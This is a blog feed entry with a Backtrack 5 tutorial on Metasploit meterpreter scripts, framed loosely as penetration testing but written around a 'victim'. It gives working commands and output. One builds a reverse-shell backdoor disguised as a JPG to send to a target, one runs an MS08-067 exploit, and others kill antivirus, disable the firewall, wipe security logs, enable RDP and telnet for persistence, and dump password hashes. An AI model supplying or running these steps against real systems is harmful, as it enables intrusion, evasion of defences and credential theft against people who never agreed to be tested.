domain="http://www.blogger.com/atom/ns#">Backtrack5</category><category domain="http://www.blogger.com/atom/ns#">Guest Post</category><title>Metasploit Meterpreter Scripting Backtrack 5 Tutorial</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/tlg8QGmcvURNo2LiHYPDxjTLcwI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/tlg8QGmcvURNo2LiHYPDxjTLcwI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/tlg8QGmcvURNo2LiHYPDxjTLcwI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/tlg8QGmcvURNo2LiHYPDxjTLcwI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.ehacking.net/2012/05/metasploit-meterpreter-scripting.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="180" src="http://4.bp.blogspot.com/-MHpX5uQyZl8/T7anMmUVPfI/AAAAAAAABLg/szJGk4m1dVo/s200/metasploit-logo.png" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://www.infosecinstitute.com/courses/security.html" style="color: blue;" target="_blank"&gt;Information security&lt;/a&gt; is a broad field and it involves the penetration testing and &lt;a href="http://www.infosecinstitute.com/courses/computer_forensics_training.html" style="color: blue;" target="_blank"&gt;computer forensic&lt;/a&gt; as well, there are so many tools are available to perform the penetration testing on the target, Metasploit is one of the best tool among them. Meterpreter is a powerful feature of metasploit that uses DLL injection 
to communicate over the socket. Meterpreter works on the client-side by 
providing a powerful environment to communicate, to transfer files.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;A 
meterpreter session can be established after successfully exploiting the
 host. Available meterpreter scripts on a metasploit database automate 
multiple processes, such as:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit;"&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Capture the screen&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Keylogging&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;File transfer&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Service detection and more&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;Even
 with numerous meterpreter scripts available, you are free to write and 
to create your own script that is best suited to your work. Some 
important aspects about the meterpreter script would be:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit;"&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Written in Ruby programming language&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Located in the metasploit directory&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Meterpreter scripts are creating everyday by different authors click &lt;a href="http://dev.metasploit.com/redmine/projects/framework/repository/show/scripts/meterpreter" style="color: blue;" target="_blank"&gt;here&lt;/a&gt; to check the list.&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Meterpreter scripts are very helpful to automate the process after compromising the host&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Meterpreter scripts are based on API and you can get more information &lt;a href="http://metasploit.com/get-support/" style="color: blue;" target="_blank"&gt;here&lt;/a&gt;.&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;There
 are so many meterpreter scripts that are available publicly for you to 
use, but if you want to create a new meterpreter script of your own and 
for public usage, this is readily doable. All you need to do is to 
follow some rules and regulations so that your script does not conflict 
with the standard variables. Ruby programming language is a basic need 
in order to write a script for meterpreter. Other important rules to 
follow are:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit;"&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Always use description so that the others will understand it&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Use local variable not global variable&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Always provide help option for better usage&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Keep
 in mind the target host (operating system, service pack (if windows), 
Kernel (for Unix) ) while creating a script, because all the system’s 
software does not contain all types of vulnerabilities&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;Let 
us consider an example: in our scenario, we need to create an infected 
file (a backdoor) so that we can send it to the victim. Metasploit 
needn’t be that big of a deal; you can even create a backdoor by using 
fast-track.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;pre style="color: #444444; font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;code&gt;root@bt:~/Desktop# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2
LPORT=4444 Desktop &amp;gt; test.jpg
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=&amp;gt;"192.168.1.2", "LPORT"=&amp;gt;"4444"}&lt;/code&gt;&lt;/b&gt;&lt;/span&gt;&lt;/pre&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;img alt="" src="http://resources.infosecinstitute.com/wp-content/uploads/110411_1612_PostExploit2.jpg?d9c344" /&gt;&lt;/span&gt; &lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;As we have typed all the things in, we can automate the process by creating a new script:&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; &lt;/b&gt;&lt;/div&gt;
&lt;pre style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;code&gt;root@bt:/pentest/exploits/framework3# touch a.rb
root@bt:/pentest/exploits/framework3# echo msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.2 LPORT=4444 Desktop &amp;gt; test.jpg
root@bt:/pentest/exploits/framework3# ruby a.rb
root@bt:/pentest/exploits/framework3#&lt;/code&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt; The result is 
the same. It is also possible to create a jpg file but that method is 
fast. Since the time-consuming method is repeating the same step, why 
not create a script for that to do all these jobs automatically? There 
are different meterpreter scripts are available; just look at the 
picture below.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;img alt="" src="http://resources.infosecinstitute.com/wp-content/uploads/110411_1612_PostExploit3.jpg?d9c344" /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;This is just one small example. Let’s create a script taking advantage of a vulnerability that will exploit an operating system:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; &lt;/b&gt;&lt;/div&gt;
&lt;pre style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;code&gt;root@bt:/pentest/exploits/framework3# touch test.rc
root@bt:/pentest/exploits/framework3# echo use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi
root@bt:/pentest/exploits/framework3# echo set RHOST 192.168.1.6
set RHOST 192.168.1.6
root@bt:/pentest/exploits/framework3# echo exploit
exploit
root@bt:/pentest/exploits/framework3# msfconsole -r test.rc&lt;/code&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;Beyond this, if we use the manual technique to do then job, then we will need to define:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit;"&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;The exploit for this case (well I have used nessus before that is why I know the system is vulnerable to ms08-067-netapi bug)&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;We need to set the remote host manually&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;We need to set local host and port manually&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;After
 the execution, the meterpreter session must be active if and only if 
the operating system is vulnerable, such as in this case:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;img alt="" src="http://resources.infosecinstitute.com/wp-content/uploads/110411_1612_PostExploit4.jpg?d9c344" /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;Now
 in this meterpreter session, we are able to call different scripts. We 
can also create our own script as well, as discussed above. Below, I 
will show you some of the best meterpreter scripts. These are highly 
useful in the process of penetration testing; however, developers are 
refining these scripts daily, so be active in the community and on 
different blogs and forums to keep yourself updated.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h2 style="color: blue; text-align: left;"&gt;



&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;b&gt;Screenspy Script&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;
 This is the basic script that will capture the screen of the victim’s 
computer. All you need to do is type in “run screenspy.” To get help of 
usage, just type in “run screenspy -h” on the meterpreter screen. After 
the execution, Firefox will open with a picture of the victim’s computer
 at that moment.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h2 style="color: blue; text-align: left;"&gt;



&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;b&gt;KillAv Script&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt; Killav script 
is a pretty famous script. As the name suggests, it will kill (close) 
antivirus softwares, so if you don’t want that antivirus’ software to 
disturb you, be sure to kill all of these antivirus softwares by using 
this script:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; &lt;/b&gt;&lt;/div&gt;
&lt;pre style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;code&gt;meterpreter &amp;gt; run killav
  [*] Killing Antivirus services on the target...
  meterpreter &amp;gt;&lt;/code&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt; Killav contains the information 
on most of the better known anti-virus’s, but if there is a new 
anti-virus, then you will need to edit this script for the best 
performance. As before with the script file, we can find the famous 
anti-virus exe name:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit;"&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;winppr32.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;winrecon.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;winservn.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;winssk32.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;winstart.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;winstart001.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;wintsk32.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;winupdate.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;wkufind.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;wnad.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;wnt.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;wradmin.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;wrctrl.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;wsbgate.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;wupdater.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;wupdt.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;wyvernworksfirewall.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;xpf202en.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;zapro.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;zapsetup3001.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;zatutor.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;zonalm2601.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;zonealarm.exe&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style="color: blue; text-align: left;"&gt;



&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;b&gt;Getcountermeasure Script&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;
 Killav is a power script and it can kill a lot of different 
anti-virus’s, but the problem is that when you implement killav, windows
 may show some types of errors and other alerts, not to mention 
firewalls. This is remedied by a wonderful script called 
Getcountermeasure:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; &lt;/b&gt;&lt;/div&gt;
&lt;pre style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;code&gt;meterpreter &amp;gt; run getcountermeasure -h
  Getcountermeasure -- List (or optionally, kill) HIPS and AV
  processes, show XP firewall rules, and display DEP and UAC
  policies

  OPTIONS:

  -d Disable built in Firewall
  -h Help menu.
  -k Kill any AV, HIPS and Third Party Firewall process found.&lt;/code&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
 Just imagine how powerful this script is! It has an ability to fight 
against Firewall, Anti-virus, IPS and even third party firewall that are
 so very common nowadays. It is really better than Killav. To use it:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; &lt;/b&gt;&lt;/div&gt;
&lt;pre style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;code&gt;meterpreter &amp;gt; run getcountermeasure -d 

  [*] Running Getcountermeasure on the target...
  [*] Checking for contermeasures...
  [*] Getting Windows Built in Firewall configuration...
  [*]
  [*]     Domain profile configuration:
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Enable
  [*]     Exception mode = Enable
  [*]
  [*]     Standard profile configuration (current):
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Disable
  [*]     Exception mode = Enable
  [*]
  [*]     Local Area Connection firewall configuration:
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Enable
  [*]
  [*] Disabling Built in Firewall.....
  [*] Checking DEP Support Policy...
&lt;/code&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;Try to understand the power of this wonderful script: it will remove security logs as well look at the picture.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;img alt="" src="http://resources.infosecinstitute.com/wp-content/uploads/110411_1612_PostExploit5.jpg?d9c344" /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h2 style="color: blue; text-align: left;"&gt;



&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;b&gt;Gettelnet script&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h2&gt;



&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; &lt;/b&gt;Telnet
 is one of the most famous services on the windows operating system. It 
will allow a remote connection, so if you want to open telnet on the 
victim’s computer for future use, then it is a good script to use. 
However, as an advance we can use SSH service for remote connection. We 
can also install netcat as a backdoor on a compromised host for future 
connections. Use this command to get more help&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; &lt;/b&gt;&lt;/div&gt;
&lt;pre style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;code&gt;  meterpreter &amp;gt; gettelnet -h&lt;/code&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
 There are a lot of different scripts are available but here we will 
discuss only the most important ones. These will help you to understand 
the network as well as help you for future connections:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Net Enum- Network Enumeration Script&lt;br /&gt; &lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;Netenum is a network enumeration script that is a wonderful script for:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit;"&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Domain Name for DNS Forward Lookup&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;To Perform DNS Forward Lookup on host list and domain&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;The target address range or CIDR identifier&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;To Perform DNS lookup of MX and NS records for a domain&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;To Perform Service Record DNS lookup for a domain&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;To Perform Ping Sweep on IP Range&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style="color: blue; font-family: inherit; text-align: left;"&gt;



&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;b&gt;Checkvm- Check Virtual Machine&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;Virtual
 machines are now an important part of enterprise network and most of 
the large (and even small) networks are using them. Checkvm is a script 
that will let you monitor the status of the victim, whether on virtual 
machine or not. It will also let you see the type of virtual machine. 
Here is the output of this case:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; &lt;/b&gt;&lt;/div&gt;
&lt;pre style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;code&gt; meterpreter &amp;gt; run checkvm
  [*] Checking if target is a Virtual Machine .....
  [*] This is a Sun VirtualBox Virtual Machine
  meterpreter &amp;gt;&lt;/code&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;h2 style="color: blue; text-align: left;"&gt;



&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;b&gt;Virus Scan Bypass&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h2&gt;



&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; &lt;/b&gt;Bypasses
 Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP 
folder, adds it to exclusion list and sets it to run at startup. Though 
we have discussed two scripts that kill anti-virus protections, it is 
good to run different scripts to verify your attack.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt; &lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; &lt;/b&gt;&lt;/div&gt;
&lt;pre style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;code&gt;  meterpreter &amp;gt; run virusscan_bypass -h&lt;/code&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;h2 style="color: blue; text-align: left;"&gt;



&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;b&gt;Enable RDP- Getgui&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h2&gt;



&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;If
 you want a graphical user interface of the victim’s computer, then you 
need to open a service called RDP (remote desktop protocol):&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; &lt;/b&gt;&lt;/div&gt;
&lt;pre style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;code&gt;  meterpreter &amp;gt; run getgui -e
  [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
  [*] Carlos Perez carlos_perez@darkoperator.com
  [*] Enabling Remote Desktop
  [*]     RDP is disabled; enabling it ...
  [*] Setting Terminal Services service startup mode&lt;/code&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;h2 style="text-align: left;"&gt;



&lt;b&gt;&lt;span style="color: blue; font-size: large;"&gt;&lt;b&gt;Hashdump&lt;/b&gt;&lt;/span&gt; &lt;/b&gt;&lt;/h2&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;
 Last but not the least: I really don’t want to end this article without
 sharing hashdump, in case you want to secure password hashes from the 
victim for future use. In some cases, these hashes works on other 
platforms:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; &lt;/b&gt;&lt;/div&gt;
&lt;pre style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;code&gt; meterpreter &amp;gt; run hashdump
  [*] Obtaining the boot key...
  [*] Calculating the hboot key using SYSKEY 374d90e7c3ff37a0d6064c461200ca22...
  [*] Obtaining the user list and keys...
  [*] Decrypting user keys...
  [*] Dumping password hashes...
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:d298b9b7042eb51df888799802d50eee:fbd49eecf08b5a011f32c57a953b5a99:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:26b787a3004f92dd4d94d34db9863999:::&lt;/code&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;
&lt;b&gt;&lt;span style="font-family: inherit; font-size: small;"&gt;&lt;br /&gt; If you have some other wonderful scripts, please share with in the comments!&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
